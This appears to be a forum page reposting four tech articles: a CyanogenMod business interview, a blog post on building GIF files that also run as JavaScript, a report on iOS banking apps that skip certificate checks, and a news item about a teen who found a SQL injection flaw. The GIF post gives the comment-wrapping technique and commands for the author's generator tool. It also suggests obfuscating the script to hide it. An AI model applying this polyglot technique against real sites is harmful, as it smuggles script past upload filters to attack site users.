  22. CyanogenMod: from bedroom Android hack to million dollar mobile OS Interview Third-party mod is set to hit the big time By Matthew Bolton January 11th CyanogenMod is one of the most popular third-party Android ROMs available, with over 8 million users. It's an operating system that's grown from the modding community into a mainstream alternative to what your current mobile phone offers. Hate Samsung's TouchWiz? Then CyanogenMod offers a more grown-up user interface. Fed up with HTC Sense or the vanilla look of pure Android on your Nexus? Then CM brings a viable alternative but there's a predicament that's been weighing on the minds of its development team. "I think that for every one person that does install CyanogenMod, there's maybe five or six that try but don't finish. I had one of our board members try to install it, and he actually gave up," laughs Koushik Dutta, one of CyanogenMod's lead developers (known to the community as Koush). The problem of getting people to actually use its software isn't something the CyanogenMod team has taken lightly. In fact, it's one of the spurs that has pushed the team into turning its community-based, open-source Android spin-off into a full-on business venture: Cyanogen Inc. With $7 million in funding behind it, the core CM team, including Koush and CyanogenMod's founder Steve Kondik (known as Cyanogen), is now working on turning the enthusiast-friendly ROM into a mainstream hit. And the first challenge is making it easy to install. Jumping hurdles "What we hear from everybody is that, 'Yeah, I share this with my friends and I think it's great, but then I tell them what they have to do to install it and they bail'," says Kondik. "So we've made this installer. We say it's one-click, though in reality it's more like three clicks. But we've been doing some pretty extensive usability testing on it, because the big goal here is to get CM to as many people as possible. "We think that the whole walled garden approach is fine, but it's getting tired, and people want an alternative, and we've absolutely proven that. By having this installer, the current growth is just going to go crazy. It's just going to sky rocket." The team behind CyanogenModHe's not joking – after announcing the Cyanogen business, the brand new servers were brought to their knees from 38 million downloads in just one month. And the team was keen to point out that, while the installer is seen as the crucial first step to making CM more popular outside of hardcore Android users, it's only the beginning. "We need to make it really easy to install, and then we have to start building compelling reasons for people to install it," says Koush. "We need to make CyanogenMod really easy to install, and then we have to start building compelling reasons for people to install it." "Right now, the main reason people install it is because what is out there is just… not very good. And I don't want the reason that users come to us to be because the competition isn't good. I want the reason users come to us to be because we're awesome." To get to a point where users are being attracted to CM, the team is taking a few different approaches. One aspect is to build more useful services into the operating system, including network-based services. "We're contracting a really notable security researcher, Moxie Marlinspike, to build a secure messaging/iMessage product for us," says Koush. In with the new Another big change will be getting CM installed on phones as the default operating system, starting with a partnership with Oppo on the N1, a new flagship phone. "Oppo had given us support in the past, and when we were forming the company, I told them what was going on. For the global release of the N1, there's an officially supported version of CM, and there's also going to be a limited edition that will actually run CM by default," says Kondik. The Oppo N1 is the first of many official devices"This is just the beginning of bigger things, really. We have the chance to do some experimentation and get everything in place to support something like this, and then next year we'll do something bigger. It's got to be done right, though. "You can't just put some branding on a phone and sell it. You've got to provide something that you can't get elsewhere, especially if you want to make money off the thing. It's going to be important to have a really great platform, really great services. People aren't just going to shell out $800 for a device unless it's really giving them something that they can't get elsewhere." One way to do this is be on a device from a new company, and that's exactly what was announced at CES 2014. It was revealed that Cyanogen Inc was teaming up with a new mobile venture from China - OnePlus. The link? The founder of OnePlus is Pete Lau, a former VP of Oppo. Mass appeal Another opportunity is to use the team's knowledge, and the flexibility of CM's Android roots, to make something new that appeals to a different audience. "CM is absolutely perfect for people who are technical, and everything is designed for people who are technical. We don't want to dumb it down, but we want to wrap some of that stuff in a prettier face. Sometime next year, we're planning on launching something quite a bit bigger that's geared more towards a broader market," says Kondik. "We don't want to dumb CyanogenMod down, but we want to wrap some of that stuff in a prettier face." These plans help to explain why the team wanted to take the chance to push CM further by creating a business around it, but the decision understandably caused some concerns from the community, while some contributors wanted to know whether they would get paid a portion of the new business money for the work they put in. "I think some of the younger guys have this vision that Steve and I got written this seven million dollar check that went into our bank accounts," says Koush. "The money that we got is to build a business, so it's hiring people, paying them, building out an office, paying for the servers that have been donated for so long, paying for bandwidth… Paying for so many different things that it's scary looking through the transactions of our bank account." Keeping competitive The new company has also announced that some of the work it will do will be proprietary, leading to concerns over the future of the open-source project. Kondik understands these fears, but is fairly bullish that they're unfounded. "When you look at Android, it was done with a very specific goal in mind – to really screw up an industry that had gone so far down the proprietary software route that it was hopeless. And they totally succeeded. But now it's happening again, and we're hoping to be the answer to that," he says. "But you have to find a balance. The things that we won't be releasing are the things that give us a competitive edge. We won't release the source code for our installer. That would be crazy." "But we don't have any plans to close source any of the existing stuff," he says, definitively. "We're building on top of the open source project. We're not even maintaining a closed fork of CM internally. Anything that we need to do to support our own applications, we'll build the APIs [application programming interface] into the open source side and ship that. Cid is CyanogenMod's slightly angry mascot "Going forward, you're going to see two release branches. One is going to be business as usual, what we're releasing today. Then you're going to see a version that comes with extra stuff that we've done that we think is pretty awesome." "We're in this for the long haul. We think it's going to be a big company. We're not trying to make a quick buck and then get out. Some community members have also worried about the pressure on a business to make money, and how that will affect CM at large. "Right now, we're following the great Silicon Valley idea of 'get the users, and the money will come later'," says Kondik. "We're in this for the long haul. We think it's going to be a big company. We're not trying to make a quick buck and then get out. We're trying to build something important. There's too much time, and too many emotions from too many people involved to give it anything less than what it deserves." Gaining ground It's important for a project like CyanogenMod to remember the emotions and history that went into getting it to where it is today. When Kondik and Koush look back on the early days, they talk about the speed of growth and voracity of its contributors as though they're not quite sure it really happened. The first official phone with Cyanogen Mod was the Oppo N1"A few people had looked at different approaches to building on Android, but when I posted my version up, people seemed to really go crazy over it," says Kondik. "It was really awesome because of how quick people were to try it out and give feedback on what's broken and what could be better. So I kept at it for a few months and more people started using it, more people started submitting patches and wanted to work on it. Koush got involved when the first Motorola Droid hit the shelves, porting CM to it." "For a mass consumer release, 'CyanogenMod' doesn't exactly roll off the tongue." "I recall the first year there was maybe only a dozen guys, and then I disappeared for a year, and I came back and there were a hundred guys," says Koush. "And then a year later there were 500, and now there's 2,000. It's just crazy. It's exponential growth for contributors and for users." But despite all the changes that come from changing from a purely contributor and community-driven project to a well funded business, the team promises that the feel of CyanogenMod won't change. Mascot Cid replaced the popular Andy Bugdroid "A lot of the guys who were on the open source project were going to their day jobs and then hacking on CM for a long time, including myself," says Kondik. "And now we just work on CM the whole time. But one thing that has not changed is working very, very late. Until 5 o'clock in the morning," he laughs. But is it the classic Silicon Valley startup with fun toys around the office? "We have a kegerator!" shouts Kondik, proudly. "And a really nice coffee machine," adds Koush. "I think we're all on the same page; the office is somewhere you want to come into and work, so we don't do cubes. We have a really nice setup and design." There is one thing that will change for CyanogenMod when it launches for a mainstream audience, though: the name. The team says that the company will still be called Cyanogen, and the open source project will keep its name, but for reaching a wider audience, the operating system will be called something new. "Yeah, it's changing…" Koush chuckles. "At some point. For a mass consumer release, 'CyanogenMod' doesn't exactly roll off the tongue." Sursa: CyanogenMod: from bedroom Android hack to million dollar mobile OS | News | TechRadar
  23. [h=2]Hacking through image: GIF turn[/h] In one of my previous posts I described a way to hack through images. That time I showed how a valid BMP file could be a valid JS file as well, hiding Javascript operations. Today it's time to describe how this attack work with a more common web file format: .GIF. Ange commented on my previous post showing me out his great work on the topic. I recomend to have a look to his study (here). Following my quick 'n dirty python implementation on the technique. The following HTML page wants to parse a GIF file and a JavaScript file which happen to be the same file: 1.gif_malw.gif. Theoretically the file should be or a valid GIF file or a valid JavaScript file. Could it be a valid javacript and a valid image file at the same time ? The answer should be NO. But properly forging the file the answer is YES, it is. Let's assume to have the following HTML page. Browsing this file you'll find out this result: As you can see, both tags (img and script) are succesfully executed. The Image tag is showing the black GIF file and the script tag is doing its gret job by executing a JavaScript (alert('test')). How is it possible ? The following image show one detail about the dirty code who generates the beautiful GIF file. This is not magic at all. This is just my implementation of the GIF parsing bug many libraries have. The idea behind this python code is to create a valid GIF header within \x2F\x2A (aka \*) and then close up the end of the image through a \x2A\x2F (aka *\). Before injecting the payload you might inject a simple expression like "=1;" or the most commonly used "=a;" in order to use all the GIF block as a variable. The following image shows the first part of a forget GIF header to exploit this weakness (click to enlarge). After having injected the "padding" chars (in this case I call padding the " '=a;' characters", which are useful to JS interpreter) it's time to inject the real payload. The small script I've realized automizes this process and you might want to run it in a really easy way: Run-it as: gif.py -i image.gif "alert(\"test\");" Don't forget, you might want to use obfuscators to better hide your javascript like the following example: python gif.py -i 2.gif "var _0x9c4c=[\"\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\",\"\x0A\",\"\x4F\x4B\"];var a=_0x9c4c[0];function MsgBox(_0xccb4x3){alert(_0xccb4x3+_0x9c4c[1]+a);} ;MsgBox(_0x9c4c[2]);" If you wat to check and/or download the code click here. Enjoy your new hackish tool ! Posted by Marco Ramilli Sursa: Marco Ramilli's Blog: Hacking through image: GIF turn
  24. Just how secure is that mobile banking app? by Paul Ducklin on January 10, 2014 Ariel Sanchez, a researcher at security assesment company IOActive, recently published a fascinating report on the sort of security you can expect if you do your internet banking on an iPhone or iPad. The answer, sadly, seems to be, "Very little." You should head over to IOActive's blog to read the whole report. Sanchez details the results of a series of offline security tests conducted against 40 different iOS banking apps used by 60 different banks in about 20 different countries. Two problems stood out particularly: 70% of the apps offered no support at all for two-factor authentication. 40% of the apps accepted any SSL certificate for secure HTTP traffic. Two-factor authentication Banks are not alone in embracing and promoting two-factor authentication (2FA), also known as two-step verification. Sites like Facebook, Twitter, and Outlook.com all offer, and encourage, the practice, for example by sending you an SMS (text message) containing a one-time passcode every time you try to log in. The extra security this provides is obvious: crooks who steal your regular username and password are out of luck unless they also steal your mobile phone, without which they won't receive the additional codes they need to login each time. You'd think that once a company had gone to the trouble of implementing 2FA for its customers, it would make it available to all its users. But many of the banks, just like the social networks and webmail services, have let their mobile apps lag behind. No support for 2FA, however, pales into insignificance when compared to the second problem: no HTTPS certificate validation. The chain of trust HTTPS certificates rely on a chain of trust, and validating that chain is important. Here's an example of an HTTPS connection, browsing to the "MySophos" download portal using Firefox: If we click on the [More information...] button, we'll see that the chain of trust runs as shown below. GlobalSign vouches for the GlobalSign Extended Validation CA (Certificate Authority), which vouches for Sophos's claim to own Antivirus, Endpoint, Disk Encryption, Mobile, UTM, Email and Web Security | Sophos And GlobalSign is trusted directly by Firefox itself, with that trust propagating downwards to Sophos's HTTPS certificate: This chain of trust stops anyone who feels like it from blindly tricking users with a certificate that says, "Hey, folks, this is sophos.com, trust us!" Anyone can create a certificate that makes such an claim, but unless they can also persuade a trusted CA to sign their home-made certificate, you'll see a warning that something fishy is going on when the imposter tries to mislead you: Digging further will explain the problem, namely that you have no reason to trust the certificate's claim that this really is a sophos.com server: You'll see a similar warning if you visit the imposter site from your iPhone or iPad, too: Again, digging further will reveal the untrusted certificate, and expose the deception, making it clear that you aren't actually dealing with sophos.com at all: Now remember that in IOActive's report, 40% of iOS banking apps simply didn't produce any warnings of that sort when faced with a fake certificate. You can feed those apps any certificate that claims to validate any website, and the app will blindly accept it. So, if the banking app is misdirected to a phishing site, for example while you are using an untrusted network such as a Wi-Fi hotspot, you simply won't know! In fact, it's not that you won't notice, but that you can't notice, and this is completely unacceptable. The silver lining, I suppose, is that 60% of the 40 apps that IOActive tested did notice bogus HTTPS certificates. The problem, though, is how you tell which camp your own bank's app falls into. If you aren't sure, it's probably best just to stick to a full-size computer, and a properly patched browser, for your internet banking. Ironically, we wrote recently about a move by Dutch banks to set some minimum security standards that they will require customers to follow if they are to qualify for refunds of money stolen through phishing, carding or other forms of online fraud. Sounds as though there may be a spot of "Physician, heal thyself" needed here... Sursa: Just how secure is that mobile banking app? | Naked Security
  25. Teen Reported to Police After Finding Security Hole in Website By Kim Zetter 01.08.14 7:44 PM Joshua Rogers. Photo: Simon Schluter. A teenager in Australia who thought he was doing a good deed by reporting a security vulnerability in a government website was reported to the police. Joshua Rogers, a 16-year-old in the state of Victoria, found a basic security hole that allowed him to access a database containing sensitive information for about 600,000 public transport users who made purchases through the Metlink web site run by the Transport Department. It was the primary site for information about train, tram and bus timetables. The database contained the full names, addresses, home and mobile phone numbers, email addresses, dates of birth, and a nine-digit extract of credit card numbers used at the site, according to The Age newspaper in Melbourne. Rogers says he contacted the site after Christmas to report the vulnerability but never got a response. After waiting two weeks, he contacted the newspaper to report the problem. When The Age called the Transportation Department for comment, it reported Rogers to the police. “It’s truly disappointing that a government agency has developed a website which has these sorts of flaws,” Phil Kernick, of cyber security consultancy CQR, told the paper. “So if this kid found it, he was probably not the first one. Someone else was probably able to find it too, which means that this information may already be out there.” The paper doesn’t say how Rogers accessed the database, but says he used a common vulnerability that exists in many web sites. It’s likely he used a SQL injection vulnerability, one of the most common ways to breach web sites and gain access to backend databases. The practice of punishing security researchers instead of thanking them for uncovering vulnerabilities is a tradition that has persisted for decades, despite extensive education about the important role such researchers play in securing systems. The Age doesn’t say whether the police took any action against Rogers. But in 2011, Patrick Webster suffered a similar consequence after reporting a website vulnerability to First State Super, an Australian investment firm that managed his pension fund. The flaw allowed any account holder to access the online statements of other customers, thus exposing some 770,000 pension accounts — including those of police officers and politicians. Webster didn’t stop at simply uncovering the vulnerability, however. He wrote a script to download about 500 account statements to prove to First State that its account holders were at risk. First State responded by reporting him to police and demanding access to his computer to make sure he’d deleted all of the statements he had downloaded. In the U.S., hacker Andrew Auernheimer, aka “weev”, is serving a three-and-a-half-year sentence for identity theft and hacking after he and a friend discovered a hole in AT&T’s website that allowed anyone to obtain the email addresses and ICC-IDs of iPad users. The ICC-ID is a unique identifier that’s used to authenticate the SIM card in a customer’s iPad to AT&T’s network. Auernheimer and his friend discovered that the site would leak email addresses to anyone who provided it with a ICC-ID. So the two wrote a script to mimic the behavior of numerous iPads contacting the web site in order to harvest the email addresses of about 120,000 iPad users. They were charged with hacking and identity theft after reporting the information to a journalist at Gawker. Auernheimer is currently appealing his conviction. Update 1.9.14: Rogers confirmed to WIRED that the vulnerability he found was a SQL-injection vulnerability. He says the police have not contacted him and that he only learned he’d been reported to the police from the journalist who wrote the story for The Age. Sursa: Teen Reported to Police After Finding Security Hole in Website | Threat Level | Wired.com
×
×
  • Create New...